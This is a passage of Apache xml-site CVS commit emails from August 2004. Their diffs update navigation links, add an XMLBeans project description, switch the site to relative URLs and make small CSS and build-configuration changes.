<a href="http://axkit.org">AxKit</a> </li> -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> </li> @@ -215,10 +210,10 @@ <a href="http://xml.apache.org/mirrors.cgi">Downloads</a> </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> <a href="http://gump.apache.org/">Gump</a> @@ -328,6 +323,9 @@ <li> <a href="#xml-commons">XML Commons: focussed on common code and guidelines for xml projects</a> </li> +<li> +<a href="#xmlbeans">XMLBeans: XML-Java binding tool</a> +</li> </ul> </li> <li> @@ -428,9 +426,14 @@ <em>XML Commons</em> - focussed on common code and guidelines for xml projects </li> + +<li> + +<em>XMLBeans</em> - XML-Java binding tool with 100% support of XML Schema. + </li> </ul> -<a name="N10075"></a><a name="xerces"></a> +<a name="N1007B"></a><a name="xerces"></a> <h4>Xerces: XML parsers in Java and C++ (plus Perl and COM)</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -451,7 +454,7 @@ A COM wrapper (also for Xerces-C) provides compatibility with the Microsoft MSXML parser. </p> </div> -<a name="N10085"></a><a name="xalan"></a> +<a name="N1008B"></a><a name="xalan"></a> <h4>Xalan: XSL stylesheet processors in Java &amp; C++</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -467,7 +470,7 @@ Xalan is currently available in Java, and C++. </p> </div> -<a name="N10092"></a><a name="axkit"></a> +<a name="N10098"></a><a name="axkit"></a> <h4>AxKit: XML-based web publishing in mod_perl</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -477,7 +480,7 @@ of XML with the performance of a native Apache solution. </p> </div> -<a name="N1009C"></a><a name="fop"></a> +<a name="N100A2"></a><a name="fop"></a> <h4>FOP: XSL Formatting Object processor in Java</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -489,7 +492,7 @@ the case of Xalan) SAX events. </p> </div> -<a name="N100A6"></a><a name="forrest"></a> +<a name="N100AC"></a><a name="forrest"></a> <h4>Forrest: Standards-based documentation framework</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -500,7 +503,7 @@ static affairs to full-blown dynamic webapps. Forrest is the system used to generate this site (xml.apache.org).</p> </div> -<a name="N100B0"></a><a name="xang"></a> +<a name="N100B6"></a><a name="xang"></a> <h4>Xang: Rapid development of dynamic server pages in JavaScript</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -510,7 +513,7 @@ industry standards such as HTTP, XML, XSL, DOM and ECMAScript (JavaScript). </p> </div> -<a name="N100BA"></a><a name="soap"></a> +<a name="N100C0"></a><a name="soap"></a> <h4>SOAP: Simple Object Access Protocol</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -528,7 +531,7 @@ datatypes, and a convention for representing remote procedure calls and responses.</p> </div> -<a name="N100C7"></a><a name="crimson"></a> +<a name="N100CD"></a><a name="crimson"></a> <h4>Crimson: A Java XML parser derived from the Sun Project X Parser</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -536,7 +539,7 @@ module. Please visit the Crimson pages for more information. </p> </div> -<a name="N100D1"></a><a name="xmlsecurity"></a> +<a name="N100D7"></a><a name="xmlsecurity"></a> <h4>XML-Security: providing security functionality for XML data</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -546,7 +549,7 @@ currently being developed. </p> </div> -<a name="N100DB"></a><a name="xindice"></a> +<a name="N100E1"></a><a name="xindice"></a> <h4>Xindice: A native XML database</h4> <div style="margin-left: 0 ; border: 2px"> <p> @@ -554,7 +557,7 @@ data or what is more commonly referred to as a native XML database. </p> </div> -<a name="N100E5"></a><a name="xml-commons"></a> +<a name="N100EB"></a><a name="xml-commons"></a> <h4>XML Commons: focussed on common code and guidelines for xml projects</h4> <div style="margin-left: 0 ; border: 2px"> @@ -570,9 +573,26 @@ xml.apache.org subprojects. </p> </div> +<a name="N100F8"></a><a name="xmlbeans"></a> +<h4>XMLBeans: XML-Java binding tool</h4> +<div style="margin-left: 0 ; border: 2px"> +<p>XMLBeans is a tool that allows you to access the full power of XML + in a Java friendly way. The idea is that you can take advantage the + richness and features of XML and XML Schema and have these features mapped + as naturally as possible to the equivalent Java language and typing constructs. + XMLBeans uses XML Schema to compile Java interfaces and classes that you can + then use to access and modify XML instance data. Using XMLBeans is similar + to using any other Java interface/class, you will see things like getFoo or + setFoo just as you would expect when working with Java. While a major use + of XMLBeans is to access your XML instance data with strongly typed Java + classes there are also API's that allow you access to the full XML infoset + (XMLBeans keeps full XML Infoset fidelity) as well as to allow you to reflect + into the XML schema itself through an XML Schema Object model. + </p> +</div> </div> -<a name="N100F3"></a><a name="participation"></a> +<a name="N10103"></a><a name="participation"></a> <h3>Anyone Can Participate</h3> <div style="margin-left: 0 ; border: 2px"> <p> 1.21 +101 -85 xml-site/targets/index.pdf <<Binary file>> 1.45 +4 -10 xml-site/targets/legal.html Index: legal.html =================================================================== RCS file: /home/cvs/xml-site/targets/legal.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- legal.html 13 Jun 2004 09:06:18 -0000 1.44 +++ legal.html 26 Aug 2004 20:31:57 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.47 +5 -11 xml-site/targets/library.html Index: library.html =================================================================== RCS file: /home/cvs/xml-site/targets/library.html,v retrieving revision 1.46 retrieving revision 1.47 diff -u -r1.46 -r1.47 --- library.html 13 Jun 2004 09:06:18 -0000 1.46 +++ library.html 26 Aug 2004 20:31:57 -0000 1.47 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> @@ -413,7 +407,7 @@ <li> -<a target="_top" href="http://nagoya.apache.org/wiki/apachewiki.cgi">The Apache Wiki</a> +<a target="_top" href="http://issues.apache.org/wiki/apachewiki.cgi">The Apache Wiki</a> <br> The Apache Wiki is a community-provided resource with unofficial documents 1.55 +2 -8 xml-site/targets/mail.html Index: mail.html =================================================================== RCS file: /home/cvs/xml-site/targets/mail.html,v retrieving revision 1.54 retrieving revision 1.55 diff -u -r1.54 -r1.55 --- mail.html 18 Jul 2004 16:27:05 -0000 1.54 +++ mail.html 26 Aug 2004 20:31:57 -0000 1.55 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> + <li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - -<li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> 1.16 +136 -120 xml-site/targets/mail.pdf <<Binary file>> 1.45 +4 -10 xml-site/targets/management.html Index: management.html =================================================================== RCS file: /home/cvs/xml-site/targets/management.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- management.html 13 Jun 2004 09:06:19 -0000 1.44 +++ management.html 26 Aug 2004 20:31:57 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.29 +3 -9 xml-site/targets/mirrors.html Index: mirrors.html =================================================================== RCS file: /home/cvs/xml-site/targets/mirrors.html,v retrieving revision 1.28 retrieving revision 1.29 diff -u -r1.28 -r1.29 --- mirrors.html 18 Jul 2004 16:15:38 -0000 1.28 +++ mirrors.html 26 Aug 2004 20:31:57 -0000 1.29 @@ -2,7 +2,7 @@ <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> -<title>Apache XML Project Downloads</title> +<title></title> <link type="text/css" href="skin/page.css" rel="stylesheet"> </head> <body text="#000000" bgcolor="#FFFFFF"> @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> 1.47 +4 -10 xml-site/targets/mission.html Index: mission.html =================================================================== RCS file: /home/cvs/xml-site/targets/mission.html,v retrieving revision 1.46 retrieving revision 1.47 diff -u -r1.46 -r1.47 --- mission.html 13 Jun 2004 09:06:19 -0000 1.46 +++ mission.html 26 Aug 2004 20:31:57 -0000 1.47 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.65 +4 -10 xml-site/targets/news.html Index: news.html =================================================================== RCS file: /home/cvs/xml-site/targets/news.html,v retrieving revision 1.64 retrieving revision 1.65 diff -u -r1.64 -r1.65 --- news.html 13 Jun 2004 09:06:19 -0000 1.64 +++ news.html 26 Aug 2004 20:31:57 -0000 1.65 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.45 +5 -11 xml-site/targets/overview.html Index: overview.html =================================================================== RCS file: /home/cvs/xml-site/targets/overview.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- overview.html 13 Jun 2004 09:06:19 -0000 1.44 +++ overview.html 26 Aug 2004 20:31:57 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> @@ -383,7 +377,7 @@ <li> -<a target="_top" href="http://nagoya.apache.org/bugzilla/">Report bugs/Request additional features</a> +<a target="_top" href="http://issues.apache.org/bugzilla/">Report bugs/Request additional features</a> </li> 1.45 +4 -10 xml-site/targets/roles.html Index: roles.html =================================================================== RCS file: /home/cvs/xml-site/targets/roles.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- roles.html 13 Jun 2004 09:06:19 -0000 1.44 +++ roles.html 26 Aug 2004 20:31:57 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.45 +4 -10 xml-site/targets/source.html Index: source.html =================================================================== RCS file: /home/cvs/xml-site/targets/source.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- source.html 13 Jun 2004 09:06:19 -0000 1.44 +++ source.html 26 Aug 2004 20:31:57 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.53 +4 -10 xml-site/targets/whoweare.html Index: whoweare.html =================================================================== RCS file: /home/cvs/xml-site/targets/whoweare.html,v retrieving revision 1.52 retrieving revision 1.53 diff -u -r1.52 -r1.53 --- whoweare.html 13 Jun 2004 09:06:19 -0000 1.52 +++ whoweare.html 26 Aug 2004 20:31:58 -0000 1.53 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.10 +2 -3 xml-site/targets/skin/page.css Index: page.css =================================================================== RCS file: /home/cvs/xml-site/targets/skin/page.css,v retrieving revision 1.9 retrieving revision 1.10 diff -u -r1.9 -r1.10 --- page.css 13 Jun 2004 09:06:20 -0000 1.9 +++ page.css 26 Aug 2004 20:31:59 -0000 1.10 @@ -45,13 +45,12 @@ .note { border: solid 1px #7099C5; background-color: #f0f0ff; } .note .label { background-color: #7099C5; color: #ffffff; } -.note .label { background-color: #7099C5; color: #ffffff; padding: 5px 5px 5px 10px; } .warning { border: solid 1px #D00000; background-color: #fff0f0; } -.warning .label { background-color: #D00000; color: #ffffff; padding: 5px 5px 5px 10px; } +.warning .label { background-color: #D00000; color: #ffffff; } .fixme { border: solid 1px #C6C600; background-color: #FAF9C3; } -.fixme .label { background-color: #C6C600; color: #ffffff; padding: 5px 5px 5px 10px; } +.fixme .label { background-color: #C6C600; color: #ffffff; } .code { border-color: #CFDCED; border-style: solid; border-width: 1px; } .codefrag { font-family: "Courier New", Courier, monospace; } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 31 03:19:41 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84747 invoked from network); 31 Aug 2004 03:19:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Aug 2004 03:19:41 -0000 Received: (qmail 91205 invoked by uid 500); 31 Aug 2004 03:19:41 -0000 Delivered-To: [email protected] Received: (qmail 91178 invoked by uid 500); 31 Aug 2004 03:19:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 91165 invoked by uid 500); 31 Aug 2004 03:19:40 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 31 Aug 2004 03:19:38 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/src/documentation/content/xdocs book.xml news.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N crossley 2004/08/30 20:19:38 Modified: src/documentation/conf cli.xconf src/documentation/content/xdocs book.xml news.xml Log: Enable better potential website mirrors. Use relative URIs with absolute paths, rather than absolute URLs, to link to xml projects. Not sure what to do about the many absolute URLs for http://xml.apache.org/dist/* and http://xml.apache.org/websrc/cvsweb.cgi/* Revision Changes Path 1.2 +16 -1 xml-site/src/documentation/conf/cli.xconf Index: cli.xconf =================================================================== RCS file: /home/cvs/xml-site/src/documentation/conf/cli.xconf,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- cli.xconf 9 Sep 2003 11:19:20 -0000 1.1 +++ cli.xconf 31 Aug 2004 03:19:37 -0000 1.2 @@ -147,6 +147,21 @@ +--> <exclude pattern="[preferred]/**" /> <exclude pattern="[location]" /> + <exclude pattern="/mirrors.cgi"/> + + <!-- exclude some stuff not under this source control --> + <exclude pattern="/pr/**"/> + + <!-- exclude projects - they build their own websites --> + <exclude pattern="/batik**"/> + <exclude pattern="/crimson**"/> + <exclude pattern="/commons**"/> + <exclude pattern="/fop**"/> + <exclude pattern="/security**"/> + <exclude pattern="/xalan**"/> + <exclude pattern="/xang**"/> + <exclude pattern="/xerces**"/> + <exclude pattern="/xindice**"/> <uri src="favicon.ico"/> 1.14 +15 -15 xml-site/src/documentation/content/xdocs/book.xml Index: book.xml =================================================================== RCS file: /home/cvs/xml-site/src/documentation/content/xdocs/book.xml,v retrieving revision 1.13 retrieving revision 1.14 diff -u -r1.13 -r1.14 --- book.xml 7 Aug 2004 00:22:43 -0000 1.13 +++ book.xml 31 Aug 2004 03:19:37 -0000 1.14 @@ -19,17 +19,17 @@ </menu> <menu label="Projects"> - <menu-item href="http://xml.apache.org/xerces2-j/index.html" label="Xerces Java 2" /> - <menu-item href="http://xml.apache.org/xerces-c/index.html" label="Xerces C++" /> - <menu-item href="http://xml.apache.org/xerces-p/index.html" label="Xerces Perl" /> - <menu-item href="http://xml.apache.org/xalan-j/index.html" label="Xalan Java 2" /> - <menu-item href="http://xml.apache.org/xalan-c/index.html" label="Xalan C++" /> - <menu-item href="http://xml.apache.org/fop/index.html" label="FOP" /> + <menu-item href="/xerces2-j/" label="Xerces Java 2" /> + <menu-item href="/xerces-c/" label="Xerces C++" /> + <menu-item href="/xerces-p/" label="Xerces Perl" /> + <menu-item href="/xalan-j/" label="Xalan Java 2" /> + <menu-item href="/xalan-c/" label="Xalan C++" /> + <menu-item href="/fop/" label="FOP" /> <menu-item href="http://forrest.apache.org/" label="Forrest"/> - <menu-item href="http://xml.apache.org/batik/index.html" label="Batik" /> - <menu-item href="http://xml.apache.org/commons/" label="XML Commons" /> - <menu-item href="http://xml.apache.org/security/index.html" label="XML Security" /> - <menu-item href="http://xml.apache.org/xindice/" label="Xindice" /> + <menu-item href="/batik/" label="Batik" /> + <menu-item href="/commons/" label="XML Commons" /> + <menu-item href="/security/" label="XML Security" /> + <menu-item href="/xindice/" label="Xindice" /> <menu-item href="http://axkit.org" label="AxKit" /> <menu-item href="http://xmlbeans.apache.org/" label="XMLBeans" /> </menu> @@ -43,13 +43,13 @@ <menu-item href="http://ws.apache.org/xmlrpc/" label="XML-RPC"/> </menu> <menu label="Moved Projects"> - <menu-item href="http://cocoon.apache.org/" label="Cocoon" /> + <menu-item href="http://cocoon.apache.org/" label="Cocoon"/> </menu> <menu label="Hibernated Projects"> - <menu-item href="http://xml.apache.org/xerces-j/index.html" label="Xerces Java 1" /> + <menu-item href="/xerces-j/" label="Xerces Java 1"/> - <menu-item href="http://xml.apache.org/xang/index.html" label="Xang" /> - <menu-item href="http://xml.apache.org/crimson/index.html" label="Crimson" /> + <menu-item href="/xang/" label="Xang"/> + <menu-item href="/crimson/" label="Crimson"/> </menu> <menu label="Community"> @@ -58,7 +58,7 @@ </menu> <menu label="Resources"> - <menu-item label="Downloads" href="http://xml.apache.org/mirrors.cgi"/> + <menu-item label="Downloads" href="/mirrors.cgi"/> <menu-item label="Bug Database" href="http://issues.apache.org/bugzilla/"/> <menu-item label="Wiki" href="http://issues.apache.org/wiki/apachewiki.cgi"/> <menu-item label="Gump" href="http://gump.apache.org/"/> 1.24 +8 -8 xml-site/src/documentation/content/xdocs/news.xml Index: news.xml =================================================================== RCS file: /home/cvs/xml-site/src/documentation/content/xdocs/news.xml,v retrieving revision 1.23 retrieving revision 1.24 diff -u -r1.23 -r1.24 --- news.xml 13 Jun 2004 08:29:52 -0000 1.23 +++ news.xml 31 Aug 2004 03:19:37 -0000 1.24 @@ -28,7 +28,7 @@ <title>Xerces-J 2.6.1 Now Available (February 2004)</title> <p> Xerces-J 2.6.1 is now available from the Xerces-J - <link href="http://xml.apache.org/xerces2-j/">site</link>. + <link href="/xerces2-j/">site</link>. </p> <p> Changes include : @@ -56,7 +56,7 @@ <title>Xalan-C++ Version 1.7 Released (January 2004)</title> <p> Xalan-C++ 1.7 is now officially available from the Xalan-C++ - <link href="http://xml.apache.org/xalan-c">site</link>. + <link href="/xalan-c/">site</link>. </p> <p> Changes include : @@ -73,11 +73,11 @@ <p> Xerces-C++ Version 2.4 has now been released, and is available from the Xerces-C++ - <link href="http://xml.apache.org/xerces-c">site</link>. + <link href="/xerces-c/">site</link>. </p> <p> Information on changes can be found - <link href="http://xml.apache.org/xerces-c/releases.html">here</link>. + <link href="/xerces-c/releases.html">here</link>. </p> </section> <section id="apachecon-us-2003"> @@ -93,7 +93,7 @@ <section id="xml-commons-resolver-1.1"> <title>XML Commons Resolver 1.1 released (November 5, 2003)</title> <p> - See the <link href="http://xml.apache.org/commons/components/resolver/resolver-release-notes.html">changelog</link> for details. + See the <link href="/commons/components/resolver/resolver-release-notes.html">changelog</link> for details. </p> </section> <section id="xml-xalan-j-2.5.2"> @@ -120,7 +120,7 @@ <p> Beta release with some new functionality and updated documentation to match Forrestized website. Expect a 1.1 release in time for the next Ant release, which bundles Resolver. - See the <link href="http://xml.apache.org/commons/components/resolver/resolver-release-notes.html">changelog</link> for details. + See the <link href="/commons/components/resolver/resolver-release-notes.html">changelog</link> for details. </p> </section> <section id="forrest-0.5.1"> @@ -155,7 +155,7 @@ <p> The release can be downloaded from <link href="http://xml.apache.org/dist/xerces-j/">http://xml.apache.org/dist/xerces-j/</link></p> <p> - For more information, visit the <link href="http://xml.apache.org/xerces2-j/">Apache Xerces2 Java Parser Project WebSite</link>. + For more information, visit the <link href="/xerces2-j/">Apache Xerces2 Java Parser Project WebSite</link>. </p> </section> <section id="fop-0.20.5"> @@ -377,7 +377,7 @@ <ul> <li> Apache forms xml.apache.org -- - <jump href="http://xml.apache.org/pr/0001.txt">PRESS RELEASE</jump> + <jump href="/pr/0001.txt">PRESS RELEASE</jump> </li> <li> CNet Article on xml.apache.org -- --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 31 03:28:01 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87619 invoked from network); 31 Aug 2004 03:28:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Aug 2004 03:28:00 -0000 Received: (qmail 96388 invoked by uid 500); 31 Aug 2004 03:28:00 -0000 Delivered-To: [email protected] Received: (qmail 96363 invoked by uid 500); 31 Aug 2004 03:28:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 96348 invoked by uid 500); 31 Aug 2004 03:28:00 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 31 Aug 2004 03:27:59 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/src/documentation/content/xdocs book.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N crossley 2004/08/30 20:27:59 Modified: src/documentation/content/xdocs book.xml Log: This should remain as an absolute URL, shouldn't it? Revision Changes Path 1.15 +1 -1 xml-site/src/documentation/content/xdocs/book.xml Index: book.xml =================================================================== RCS file: /home/cvs/xml-site/src/documentation/content/xdocs/book.xml,v retrieving revision 1.14 retrieving revision 1.15 diff -u -r1.14 -r1.15 --- book.xml 31 Aug 2004 03:19:37 -0000 1.14 +++ book.xml 31 Aug 2004 03:27:59 -0000 1.15 @@ -58,7 +58,7 @@ </menu> <menu label="Resources"> - <menu-item label="Downloads" href="/mirrors.cgi"/> + <menu-item label="Downloads" href="http://xml.apache.org/mirrors.cgi"/> <menu-item label="Bug Database" href="http://issues.apache.org/bugzilla/"/> <menu-item label="Wiki" href="http://issues.apache.org/wiki/apachewiki.cgi"/> <menu-item label="Gump" href="http://gump.apache.org/"/> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 31 03:35:30 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90475 invoked from network); 31 Aug 2004 03:35:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Aug 2004 03:35:30 -0000 Received: (qmail 974 invoked by uid 500); 31 Aug 2004 03:35:29 -0000 Delivered-To: [email protected] Received: (qmail 954 invoked by uid 500); 31 Aug 2004 03:35:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 940 invoked by uid 500); 31 Aug 2004 03:35:29 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 31 Aug 2004 03:35:26 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/targets/skin page.css X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N crossley 2004/08/30 20:35:26 Modified: targets ack.html communication.html contact.html cvs.html decisions.html guidelines.html index.html legal.html library.html mail.html management.html mirrors.html mission.html news.html news.pdf overview.html roles.html source.html whoweare.html targets/skin page.css Log: Enable better potential website mirrors. Use relative URIs with absolute paths, rather than absolute URLs, to link to xml projects. Revision Changes Path 1.46 +13 -13 xml-site/targets/ack.html Index: ack.html =================================================================== RCS file: /home/cvs/xml-site/targets/ack.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- ack.html 26 Aug 2004 20:31:56 -0000 1.45 +++ ack.html 31 Aug 2004 03:35:24 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a 